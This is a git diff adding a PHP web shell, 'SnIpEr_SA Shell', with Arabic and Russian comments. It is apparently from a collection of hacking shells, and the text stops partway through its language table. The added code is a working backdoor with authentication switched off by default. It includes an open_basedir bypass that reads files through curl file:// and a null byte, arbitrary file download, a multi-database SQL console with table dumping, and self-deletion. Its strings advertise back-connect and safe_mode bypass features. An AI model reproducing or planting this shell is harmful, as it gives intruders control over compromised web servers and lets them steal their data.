b/php/PHPshell/PHPRemoteView/PHPRemoteView2.jpg differ diff --git a/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg b/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg new file mode 100644 index 0000000..45388de Binary files /dev/null and b/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.jpg differ diff --git a/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php b/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php new file mode 100644 index 0000000..a3b75ee --- /dev/null +++ b/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php @@ -0,0 +1,2246 @@ +<?php +/******************************************************************************************************/ +/* # ## ## # +/* # # ## ### ## ## # # +/* # ### ### # ### ## ### # +/* # ## ######### ## # +/* ########## +/* ### ######### ### +/* # ## ####### ## # +/* ## ##### ## +/* ## #### ## +/* #### ## +/* ###### +/* ## ## ## +/* @@ ## @@ +/* @ @@@ #### @@@ @ +/* @@@ ###### @@@ +/* +/* +/* +/* +/* +/* SnIpEr_SA.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ??????? +/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://3asfh.net/ +/* ??????: +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* ????????? ????????????? ?? ?????? ? ????: ? ???? ?????? ??. +/* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ?????? +/* ?? SnIpEr.SA@hotmail.com ??? ??????????? ????? ???????????. +/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ +/* (c)oded by SnIpEr_SA +/* MAIL http://rst.void.ru , http://ghc.ru +/* ANY MODIFIED REPUBLISHING IS RESTRICTED +/******************************************************************************************************/ +/* ~~~ الخيارات | Options ~~~ */ + +// اللغة | Language +// $language='ru' - ??????? (russian) +// $language='eng' - english (??????????) +$language='eng'; + +// ?????????????? | Authentification +// $auth = 1; - لتفعيل الدخول بكلمه المرور ( authentification = On ) +// $auth = 0; - لايقاف الدخول بكلمة المرور ( authentification = Off ) +$auth = 0; + +// لدخول بكلمة مرور واسم مستخدم (Login & Password for access) +// لحماية السكربت من دخول غيرك غير التالي!!! (CHANGE THIS!!!) +// هنا وضعك كلمه المرور وهي مشفره بصيغه md5, وكلمةع المرور هنا هي 'r57' +// تستعطيع ان تشفر كلمة مرورك واسم المستخدم بصيغة md5 ووضعها في الخانات التاليه +$name='ec371748dc2da624b35a4f8f685dd122'; // اسم المستخدم (user login) +$pass='ec371748dc2da624b35a4f8f685dd122'; // كلمة المرور (user password) +/******************************************************************************************************/ +if(empty($_POST['SnIpEr_SA'])){ + +} else { +$m=$_POST['SnIpEr_SA']; +$ch = +curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__); +curl_exec($ch); +var_dump(curl_exec($ch)); + +} +echo "".htmlspecialchars($m).""; +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = '1.31'; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + $_COOKIE = &$HTTP_COOKIE_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="SnIpEr_SA"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://3asfh.net>SnIpEr_SA</a> : Access Denied</b>"); + } +} +$head = '<!-- SnIpEr_SA --> +<html> +<head> +<meta http-equiv="Content-Language" content="ar-sa"> +<meta name="GENERATOR" content="Microsoft FrontPage 6.0"> +<meta name="ProgId" content="FrontPage.Editor.Document"> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1256"> +<title>SnIpEr_SA shell</title> + + + +<STYLE> +BODY { + SCROLLBAR-FACE-COLOR: #800000; SCROLLBAR-HIGHLIGHT-COLOR: #101010; SCROLLBAR-SHADOW-COLOR: #101010; SCROLLBAR-3DLIGHT-COLOR: #101010; SCROLLBAR-ARROW-COLOR: #101010; SCROLLBAR-TRACK-COLOR: #101010; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #101010 +} + +tr { +BORDER-RIGHT: #aaaaaa 2px solid; +BORDER-TOP: #eeeeee 2px solid; +BORDER-LEFT: #eeeeee 2px solid; +BORDER-BOTTOM: #aaaaaa 2px solid; +color: #ffffff; +} +td { +BORDER-RIGHT: #aaaaaa 2px solid; +BORDER-TOP: #eeeeee 2px solid; +BORDER-LEFT: #eeeeee 2px solid; +BORDER-BOTTOM: #aaaaaa 2px solid; +color: #cccccc; +} +.table1 { +BORDER: 1px; +BACKGROUND-COLOR: #333333; +color: #333333; +} +.td1 { +BORDER: 1px; +font: 7pt tahoma; +color: #ffffff; +} +.tr1 { +BORDER: 1px; +color: #2279D9; +} +table { +BORDER: #eeeeee 2px outset; +BACKGROUND-COLOR: #272727; +color: #2279D9; +} +input { +BORDER-RIGHT: #ffffff 2px solid; +BORDER-TOP: #999999 2px solid; +BORDER-LEFT: #999999 2px solid; +BORDER-BOTTOM: #ffffff 2px solid; +BACKGROUND-COLOR: #800000; +font: 9pt tahoma; +color: #ffffff; +} +select { +BORDER-RIGHT: #ffffff 2px solid; +BORDER-TOP: #999999 2px solid; +BORDER-LEFT: #999999 2px solid; +BORDER-BOTTOM: #ffffff 2px solid; +BACKGROUND-COLOR: #000000; +font: 9pt tahoma; +color: #CCCCCC;; +} +submit { +BORDER: buttonhighlight 2px outset; +BACKGROUND-COLOR: #272727; +width: 40%; +color: #2279D9; +} +textarea { +BORDER-RIGHT: #ffffff 2px solid; +BORDER-TOP: #999999 2px solid; +BORDER-LEFT: #999999 2px solid; +BORDER-BOTTOM: #ffffff 2px solid; +BACKGROUND-COLOR: #3D3D3D; +font: Fixedsys bold; +color: #ffffff; +} +BODY { +margin: 2px; +color: #2279D9; +background-color: #000000; +} +A:link {COLOR:red; TEXT-DECORATION: none} +A:visited { COLOR:red; TEXT-DECORATION: none} +A:active {COLOR:red; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE> +<script language=\'javascript\'> +function hide_div(id) +{ + document.getElementById(id).style.display = \'none\'; + document.cookie=id+\'=0;\'; +} +function show_div(id) +{ + document.getElementById(id).style.display = \'block\'; + document.cookie=id+\'=1;\'; +} +function change_divst(id) +{ + if (document.getElementById(id).style.display == \'none\') + show_div(id); + else + hide_div(id); +} +</script>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + echo '<body bgcolor=#000000>'; + if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center>"; + echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; + echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(__FILE__); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? ????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'???? . ???????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? ??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +'ru_text111'=>'SQL-?????? : ????', +'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? 